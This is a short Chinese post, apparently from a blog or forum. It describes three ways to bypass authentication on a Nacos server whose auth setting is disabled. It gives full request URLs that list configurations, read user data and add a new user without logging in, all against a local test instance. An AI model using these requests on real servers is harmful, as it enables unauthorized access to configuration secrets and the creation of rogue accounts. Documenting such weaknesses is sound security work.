如果nacos没有开启权限认证,即如下属性设置为false。
nacos.core.auth.enabled = false
在这种情况下,通过一些请求就可以绕过nacos的权限认证。我找到了下述三种方式。
一、/nacos/v1/cs/configs我们在浏览器中直接拼接 /nacos/v1/cs/configs请求,如下所示。
http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=&username=
浏览器虽然会直接跳到登录页面,但是通过F12 却可以看到返回了配置列表。
二、GET请求 /nacos/v1/auth/users在未登录的情况下,通过postman以get方式访问该请求,能拿到用户信息。
三、POST请求 /nacos/v1/auth/usershttp://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
在未登录的情况下,通过postman以post方式访问该请求,传入指定参数,可以直接新增用户。
http://127.0.0.1:8848/nacos/v1/auth/users?username=test2&password=test2
测试登录情况也正常。
如果你还知道其他问题,欢迎补充或更正。
